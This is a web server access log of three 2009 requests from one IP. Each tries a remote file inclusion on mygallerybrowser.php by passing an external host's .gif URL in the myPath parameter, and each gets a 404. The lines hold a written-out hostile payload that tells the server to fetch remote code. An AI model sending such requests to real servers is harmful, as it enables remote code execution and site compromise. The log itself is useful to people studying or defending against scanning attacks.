75.126.94.66 - - [27/Sep/2009:20:47:12 -0700] "GET /mygallerybrowser.php?myPath=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.94.66 - - [27/Sep/2009:20:47:12 -0700] "GET /logs/mygallerybrowser.php?myPath=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.94.66 - - [27/Sep/2009:20:47:12 -0700] "GET /logs/access_090615.log%20%20/mygallerybrowser.php?myPath=http://roxcrime.fileave.com/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
